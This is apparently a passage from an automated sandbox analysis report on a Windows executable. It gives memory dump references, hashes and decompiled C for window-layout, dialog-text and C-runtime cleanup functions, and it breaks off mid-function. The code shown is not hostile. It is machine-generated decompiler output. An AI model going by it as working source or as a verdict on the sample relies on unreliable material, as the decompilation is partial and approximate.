          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b75e1f005c90f2ee28155d8a7daac4ff7dc93df0cb9d42f3ae0ce2650a7f898a
          • Instruction ID: 5209204e846b435a6bcecfc471b0be3144f992229f477d7ec516c94acc4ed5a4
          • Opcode Fuzzy Hash: b75e1f005c90f2ee28155d8a7daac4ff7dc93df0cb9d42f3ae0ce2650a7f898a
          • Instruction Fuzzy Hash: FE81BF9211A2E4AEC70A9F3D38A82F57FA24773341B1D44FAC5C9C72A3C1768658D722
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FF5C5, Relevance: .1, Instructions: 131COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c48b338f0865ebf52c8054d329703e302ca3dbc735afef9bd6db5331297f51fe
          • Instruction ID: d54f3dfd0a9d2ca60774f6788abf0dd0b4cfdb86706962e679bea30a48a121a9
          • Opcode Fuzzy Hash: c48b338f0865ebf52c8054d329703e302ca3dbc735afef9bd6db5331297f51fe
          • Instruction Fuzzy Hash: 605135B1A083068BC748CF19D49059AF7E1FF88314F054A2EE889E7740DB34E959CB9A
          Uniqueness

          Uniqueness Score: -1.00%

          Function 002033D3, Relevance: .1, Instructions: 112COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
          • Instruction ID: 1fd2d1267363418b4b0f3c5b9d13b90051fd67de872e486a0ace961680f4059e
          • Opcode Fuzzy Hash: c5a3c253f54b37c12cd05f9979f55901904f153f4bb8052c0732b1284848e5c5
          • Instruction Fuzzy Hash: C631E7B161471A8FCB14DF28C85126ABBD0FF95300F44452DE9C9D7742C778EA19CB91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F5D7E, Relevance: .1, Instructions: 76COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c5f3f2e1f5dd582b4f9dca5aa63d8e98c63384b2de0a85a7e65fdfc80582ab41
          • Instruction ID: d83afeaa52b1fdb6fe2b07ef24dc744612f5455ee128ce51afdc56a9da7b69cc
          • Opcode Fuzzy Hash: c5f3f2e1f5dd582b4f9dca5aa63d8e98c63384b2de0a85a7e65fdfc80582ab41
          • Instruction Fuzzy Hash: A421CB31A210255BCB18CF6DED9447A7761974630134A813BEB469F291C634E926D7D0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FD70B, Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 235COMMON
          Download Yara Rule
          C-Code - Quality: 75%
          			E001FD70B(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t96;
				signed int _t104;
				struct HWND__* _t106;
				signed int _t119;
				signed int _t134;
				void* _t150;
				void* _t155;
				char _t156;
				void* _t157;
				signed int _t158;
				intOrPtr _t160;
				void* _t163;
				void* _t169;
				long _t170;
				signed int _t174;
				signed int _t185;
				struct HWND__* _t186;
				struct HWND__* _t187;
				void* _t188;
				void* _t191;
				signed int _t192;
				long _t193;
				void* _t200;
				int* _t201;
				struct HWND__* _t202;
				void* _t204;
				void* _t205;
				void* _t207;
				void* _t209;
				void* _t213;

				_t202 = __ecx;
				_v2368.bottom = __ecx;
				E001F3E41( &_v2208, 0x50, L"$%s:", _a8);
				_t207 =  &_v2368 + 0x10;
				E002011FA( &_v2208,  &_v2288, 0x50);
				_t96 = E00212BB0( &_v2300);
				_t186 = _v8;
				_t155 = 0;
				_v2376 = _t96;
				_t209 =  *0x22d5f4 - _t155; // 0x63
				if(_t209 <= 0) {
					L8:
					_t156 = E001FCD7D(_t155, _t202, _t188, _t213, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t156;
					GetWindowRect(_t186,  &_v2352);
					GetClientRect(_t186,  &(_v2320.top));
					_t169 = _v2352.right - _v2352.left + 1;
					_t104 = _v2320.bottom;
					_t191 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t204 = _t191 - _v2304;
					_v2368.bottom = _t169 - _t104;
					if(_t156 == 0) {
						L15:
						_t221 = _a12;
						if(_a12 == 0 && E001FCE00(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t186,  &_v2048);
						}
						L18:
						_t205 = _t204 - GetSystemMetrics(8);
						_t106 = GetWindow(_t186, 5);
						_t187 = _t106;
						_v2368.bottom = _t187;
						if(_t156 == 0) {
							L24:
							return _t106;
						}
						_t157 = 0;
						while(_t187 != 0) {
							__eflags = _t157 - 0x200;
							if(_t157 >= 0x200) {
								goto L24;
							}
							GetWindowRect(_t187,  &_v2320);
							_t170 = _v2320.top.left;
							_t192 = 0x64;
							asm("cdq");
							_t193 = _v2320.left;
							asm("cdq");
							_t119 = (_t170 - _t205 - _v2336) * _v2368.top;
							asm("cdq");
							_t174 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0x22dfd0(_t187, 0, (_t193 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t193 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t192, 0x204);
							_t106 = GetWindow(_t187, 2);
							_t187 = _t106;
							__eflags = _t187 - _v2384;
							if(_t187 == _v2384) {
								goto L24;
							}
							_t157 = _t157 + 1;
							__eflags = _t157;
						}
						goto L24;
					}
					if(_a12 != 0) {
						goto L18;
					}
					_t158 = 0x64;
					asm("cdq");
					_t134 = _v2292 * _v2368.top;
					_t160 = _t104 * _v2368.right / _t158 + _v2352.right;
					_v2324 = _t160;
					asm("cdq");
					_t185 = _t134 % _v2352.top;
					_v2352.left = _t134 / _v2352.top + _t204;
					asm("cdq");
					asm("cdq");
					_t200 = (_t191 - _v2352.left - _t185 >> 1) + _v2336;
					_t163 = (_t169 - _t160 - _t185 >> 1) + _v2352.bottom;
					if(_t163 < 0) {
						_t163 = 0;
					}
					if(_t200 < 0) {
						_t200 = 0;
					}
					 *0x22dfd0(_t186, 0, _t163, _t200, _v2324, _v2352.left,  !(GetWindowLongW(_t186, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
					GetWindowRect(_t186,  &_v2368);
					_t156 = _v2393;
					goto L15;
				} else {
					_t201 = 0x22d154;
					do {
						if( *_t201 > 0) {
							_t9 =  &(_t201[1]); // 0x2233e0
							_t150 = E00215460( &_v2288,  *_t9, _t96);
							_t207 = _t207 + 0xc;
							if(_t150 == 0) {
								_t12 =  &(_t201[1]); // 0x2233e0
								if(E001FCF57(_t155, _t202, _t201,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t186,  *_t201,  &_v2048);
								}
							}
							_t96 = _v2368.top;
						}
						_t155 = _t155 + 1;
						_t201 =  &(_t201[3]);
						_t213 = _t155 -  *0x22d5f4; // 0x63
					} while (_t213 < 0);
					goto L8;
				}
			}



















































          0x001fd723
          0x001fd72d
          0x001fd731
          0x001fd736
          0x001fd748
          0x001fd752
          0x001fd757
          0x001fd75e
          0x001fd761
          0x001fd765
          0x001fd76b
          0x001fd7c8
          0x001fd7e0
          0x001fd7e8
          0x001fd7ec
          0x001fd7f8
          0x001fd80a
          0x001fd811
          0x001fd815
          0x001fd818
          0x001fd820
          0x001fd826
          0x001fd82c
          0x001fd8cd
          0x001fd8cd
          0x001fd8d5
          0x001fd906
          0x001fd906
          0x001fd90c
          0x001fd917
          0x001fd919
          0x001fd91f
          0x001fd921
          0x001fd927
          0x001fd9d9
          0x001fd9d9
          0x001fd9d9
          0x001fd92d
          0x001fd9c7
          0x001fd934
          0x001fd93a
          0x00000000
          0x00000000
          0x001fd946
          0x001fd950
          0x001fd965
          0x001fd96a
          0x001fd96d
          0x001fd983
          0x001fd98b
          0x001fd98d
          0x001fd98e
          0x001fd996
          0x001fd9a8
          0x001fd9af
          0x001fd9b8
          0x001fd9be
          0x001fd9c0
          0x001fd9c4
          0x00000000
          0x00000000
          0x001fd9c6
          0x001fd9c6
          0x001fd9c6
          0x00000000
          0x001fd9c7
          0x001fd83a
          0x00000000
          0x00000000
          0x001fd847
          0x001fd848
          0x001fd851
          0x001fd856
          0x001fd85c
          0x001fd860
          0x001fd861
          0x001fd867
          0x001fd871
          0x001fd878
          0x001fd881
          0x001fd885
          0x001fd889
          0x001fd88b
          0x001fd88b
          0x001fd88f
          0x001fd891
          0x001fd891
          0x001fd8b7
          0x001fd8c3
          0x001fd8c9
          0x00000000
          0x001fd76d
          0x001fd76d
          0x001fd772
          0x001fd775
          0x001fd778
          0x001fd780
          0x001fd785
          0x001fd78a
          0x001fd79b
          0x001fd7a5
          0x001fd7b2
          0x001fd7b2
          0x001fd7a5
          0x001fd7b8
          0x001fd7b8
          0x001fd7bc
          0x001fd7bd
          0x001fd7c0
          0x001fd7c0
          0x00000000
          0x001fd772

          APIs
          • _swprintf.LIBCMT ref: 001FD731
            • Part of subcall function 001F3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001F3E54
            • Part of subcall function 002011FA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00230078,?,001FCE91,00000000,?,00000050,00230078), ref: 00201217
          • _strlen.LIBCMT ref: 001FD752
          • SetDlgItemTextW.USER32(?,0022D154,?), ref: 001FD7B2
          • GetWindowRect.USER32(?,?), ref: 001FD7EC
          • GetClientRect.USER32(?,?), ref: 001FD7F8
          • GetWindowLongW.USER32(?,000000F0), ref: 001FD896
          • GetWindowRect.USER32(?,?), ref: 001FD8C3
          • SetWindowTextW.USER32(?,?), ref: 001FD906
          • GetSystemMetrics.USER32(00000008), ref: 001FD90E
          • GetWindow.USER32(?,00000005), ref: 001FD919
          • GetWindowRect.USER32(00000000,?), ref: 001FD946
          • GetWindow.USER32(00000000,00000002), ref: 001FD9B8
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
          • String ID: $%s:$CAPTION$d
          • API String ID: 2407758923-2512411981
          • Opcode ID: 1c8843a41c2dd0457b1deb54580d04c5740ebfe4ad4ec32dd67b8a9aca5da0c5
          • Instruction ID: 8c039b5207c253227bf2a7861a1ebef3e962abfe44ca31a57b46b53c9a664229
          • Opcode Fuzzy Hash: 1c8843a41c2dd0457b1deb54580d04c5740ebfe4ad4ec32dd67b8a9aca5da0c5
          • Instruction Fuzzy Hash: B4818071108305AFD720DFA8DD89A7FBBE9EB88704F04091DFA8597291D770A9058B52
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0021B784, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E0021B784(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x22dd50) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00217A50(_t46);
							E0021B363( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00217A50(_t47);
							E0021B461( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00217A50( *((intOrPtr*)(_t74 + 0x7c)));
						E00217A50( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00217A50( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00217A50( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00217A50( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00217A50( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0021B8F7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x22d818) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00217A50(_t31);
							E00217A50( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00217A50(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00217A50(_t74);
			}















          0x0021b78c
          0x0021b790
          0x0021b798
          0x0021b7a1
          0x0021b7a6
          0x0021b7ad
          0x0021b7b5
          0x0021b7bd
          0x0021b7c8
          0x0021b7ce
          0x0021b7cf
          0x0021b7d7
          0x0021b7df
          0x0021b7ea
          0x0021b7f0
          0x0021b7f4
          0x0021b7ff
          0x0021b805
          0x0021b7a6
          0x0021b806
          0x0021b80e
          0x0021b821
          0x0021b834
          0x0021b842
          0x0021b84d
          0x0021b852
          0x0021b85b
          0x0021b863
          0x0021b864
          0x0021b86a
          0x0021b86d
          0x0021b870
          0x0021b877
          0x0021b879
          0x0021b87d
          0x0021b885
          0x0021b88c
          0x0021b892
          0x0021b893
          0x0021b893
          0x0021b89a
          0x0021b89c
          0x0021b8a1
          0x0021b8a9
          0x0021b8ae
          0x0021b8af
          0x0021b8af
          0x0021b8b2
          0x0021b8b5
          0x0021b8b8
          0x0021b8bb
          0x0021b8bb
          0x0021b8cd

          APIs
          • ___free_lconv_mon.LIBCMT ref: 0021B7C8
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B380
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B392
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B3A4
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B3B6
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B3C8
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B3DA
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B3EC
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B3FE
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B410
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B422
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B434
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B446
            • Part of subcall function 0021B363: _free.LIBCMT ref: 0021B458
          • _free.LIBCMT ref: 0021B7BD
            • Part of subcall function 00217A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?), ref: 00217A66
            • Part of subcall function 00217A50: GetLastError.KERNEL32(?,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?,?), ref: 00217A78
          • _free.LIBCMT ref: 0021B7DF
          • _free.LIBCMT ref: 0021B7F4
          • _free.LIBCMT ref: 0021B7FF
          • _free.LIBCMT ref: 0021B821
          • _free.LIBCMT ref: 0021B834
          • _free.LIBCMT ref: 0021B842
          • _free.LIBCMT ref: 0021B84D
          • _free.LIBCMT ref: 0021B885
          • _free.LIBCMT ref: 0021B88C
          • _free.LIBCMT ref: 0021B8A9
          • _free.LIBCMT ref: 0021B8C1
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
          • String ID:
          • API String ID: 161543041-0
          • Opcode ID: cf407d02439e2cbb1c0219e1bdb6e6bf0d0a8685ae2c4c6ccf248b1f2ea2e44d
          • Instruction ID: bcfb633e1474cc57b484b9f90ff7cdcb90c4bd5a8e23246a9521116ab2cb2577
          • Opcode Fuzzy Hash: cf407d02439e2cbb1c0219e1bdb6e6bf0d0a8685ae2c4c6ccf248b1f2ea2e44d
          • Instruction Fuzzy Hash: B3314F315246069FEB22AE79D885BDAB3F8EF60750F215429F059D7191DF30ADE08B24
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00218422, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E00218422(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x224be0) {
					E00217A50(_t52);
					_t26 = _a4;
				}
				E00217A50( *((intOrPtr*)(_t26 + 0x3c)));
				E00217A50( *((intOrPtr*)(_a4 + 0x30)));
				E00217A50( *((intOrPtr*)(_a4 + 0x34)));
				E00217A50( *((intOrPtr*)(_a4 + 0x38)));
				E00217A50( *((intOrPtr*)(_a4 + 0x28)));
				E00217A50( *((intOrPtr*)(_a4 + 0x2c)));
				E00217A50( *((intOrPtr*)(_a4 + 0x40)));
				E00217A50( *((intOrPtr*)(_a4 + 0x44)));
				E00217A50( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E002182E8(5,  &_v8);
				_v8 =  &_a4;
				return E00218338(4,  &_v8);
			}




          0x00218428
          0x0021842b
          0x00218433
          0x00218436
          0x0021843b
          0x0021843e
          0x00218442
          0x0021844d
          0x00218458
          0x00218463
          0x0021846e
          0x00218479
          0x00218484
          0x0021848f
          0x0021849d
          0x002184a5
          0x002184ae
          0x002184b6
          0x002184ca

          APIs
          • _free.LIBCMT ref: 00218436
            • Part of subcall function 00217A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?), ref: 00217A66
            • Part of subcall function 00217A50: GetLastError.KERNEL32(?,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?,?), ref: 00217A78
          • _free.LIBCMT ref: 00218442
          • _free.LIBCMT ref: 0021844D
          • _free.LIBCMT ref: 00218458
          • _free.LIBCMT ref: 00218463
          • _free.LIBCMT ref: 0021846E
          • _free.LIBCMT ref: 00218479
          • _free.LIBCMT ref: 00218484
          • _free.LIBCMT ref: 0021848F
          • _free.LIBCMT ref: 0021849D
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID: K"
          • API String ID: 776569668-584860598
          • Opcode ID: ab33542edcbc8e5da63213baf21ea8557e3d9a38dc87984084a9934a924d659c
          • Instruction ID: d34b2983566b6f5f87c4856390955af3b8728d13dc91b4c95f0f228e9d28a019
          • Opcode Fuzzy Hash: ab33542edcbc8e5da63213baf21ea8557e3d9a38dc87984084a9934a924d659c
          • Instruction Fuzzy Hash: 92117476564108FFCB01EFA4D882CDE3BB5EF54350F5151A5FA198B222DA31EBA09F80
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020C343, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 80windowCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E0020C343(void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				short _v4124;
				void* _t10;
				struct HWND__* _t11;
				void* _t21;
				void* _t28;
				void* _t29;
				void* _t31;
				struct HWND__* _t34;
				void* _t45;

				_t45 = __fp0;
				_t29 = __edx;
				E0020D940();
				_t10 = E0020952A(__eflags);
				if(_t10 == 0) {
					return _t10;
				}
				_t11 = GetWindow(_a4, 5);
				_t34 = _t11;
				_t31 = 0;
				_a4 = _t34;
				if(_t34 == 0) {
					L11:
					return _t11;
				}
				while(_t31 < 0x200) {
					GetClassNameW(_t34,  &_v4124, 0x800);
					if(E00201410( &_v4124, L"STATIC") == 0 && (GetWindowLongW(_t34, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t28 = SendMessageW(_t34, 0x173, 0, 0);
						if(_t28 != 0) {
							GetObjectW(_t28, 0x18,  &_v28);
							_t21 = E0020958C(_v20);
							SendMessageW(_t34, 0x172, 0, E0020975D(_t29, _t45, _t28, E00209549(_v24), _t21));
							DeleteObject(_t28);
						}
					}
					_t11 = GetWindow(_t34, 2);
					_t34 = _t11;
					if(_t34 != _a4) {
						_t31 = _t31 + 1;
						if(_t34 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}















          0x0020c343
          0x0020c343
          0x0020c34b
          0x0020c350
          0x0020c357
          0x0020c42e
          0x0020c42e
          0x0020c364
          0x0020c36a
          0x0020c36c
          0x0020c36e
          0x0020c373
          0x0020c429
          0x00000000
          0x0020c42a
          0x0020c37a
          0x0020c393
          0x0020c3ac
          0x0020c3ce
          0x0020c3d2
          0x0020c3db
          0x0020c3e4
          0x0020c402
          0x0020c409
          0x0020c409
          0x0020c3d2
          0x0020c412
          0x0020c418
          0x0020c41d
          0x0020c41f
          0x0020c422
          0x00000000
          0x00000000
          0x0020c422
          0x00000000
          0x0020c41d
          0x00000000

          APIs
          • GetWindow.USER32(?,00000005), ref: 0020C364
          • GetClassNameW.USER32(00000000,?,00000800), ref: 0020C393
            • Part of subcall function 00201410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,001FACFE,?,?,?,001FACAD,?,-00000002,?,00000000,?), ref: 00201426
          • GetWindowLongW.USER32(00000000,000000F0), ref: 0020C3B1
          • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0020C3C8
          • GetObjectW.GDI32(00000000,00000018,?), ref: 0020C3DB
            • Part of subcall function 0020958C: GetDC.USER32(00000000), ref: 00209598
            • Part of subcall function 0020958C: GetDeviceCaps.GDI32(00000000,0000005A), ref: 002095A7
            • Part of subcall function 0020958C: ReleaseDC.USER32(00000000,00000000), ref: 002095B5
            • Part of subcall function 00209549: GetDC.USER32(00000000), ref: 00209555
            • Part of subcall function 00209549: GetDeviceCaps.GDI32(00000000,00000058), ref: 00209564
            • Part of subcall function 00209549: ReleaseDC.USER32(00000000,00000000), ref: 00209572
          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0020C402
          • DeleteObject.GDI32(00000000), ref: 0020C409
          • GetWindow.USER32(00000000,00000002), ref: 0020C412
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
          • String ID: STATIC
          • API String ID: 1444658586-1882779555
          • Opcode ID: ee42cbf3181ce3812a1791c191003d001a98d9b3f77bc9dcd7488e64ab86e757
          • Instruction ID: e4f8d1fcf36e75d4de8e9010c9e11c5265a4c2e2247bd2f7481ef728dd80d418
          • Opcode Fuzzy Hash: ee42cbf3181ce3812a1791c191003d001a98d9b3f77bc9dcd7488e64ab86e757
          • Instruction Fuzzy Hash: 6021C3B25603157BEB316FA49C4AFEF7A2CBB09710F105121FA02B60D3CB744A528AA4
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F200C, Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
          Download Yara Rule
          C-Code - Quality: 93%
          			E001F200C(intOrPtr __ecx) {
				signed int _t135;
				void* _t137;
				signed int _t139;
				unsigned int _t140;
				signed int _t144;
				signed int _t161;
				signed int _t164;
				void* _t167;
				void* _t172;
				signed int _t175;
				signed char _t178;
				signed char _t179;
				signed char _t180;
				signed int _t182;
				signed int _t185;
				signed int _t187;
				signed int _t188;
				signed char _t220;
				signed char _t232;
				signed int _t233;
				signed int _t236;
				intOrPtr _t240;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t257;
				signed int _t258;
				signed char _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr _t272;
				intOrPtr _t275;
				intOrPtr _t278;
				intOrPtr _t314;
				signed int _t315;
				intOrPtr _t318;
				signed int _t322;
				void* _t323;
				void* _t324;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr* _t336;
				signed int _t339;
				void* _t340;
				signed int _t341;
				char* _t342;
				void* _t343;
				void* _t344;
				signed int _t348;
				signed int _t351;
				signed int _t366;

				E0020D940();
				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
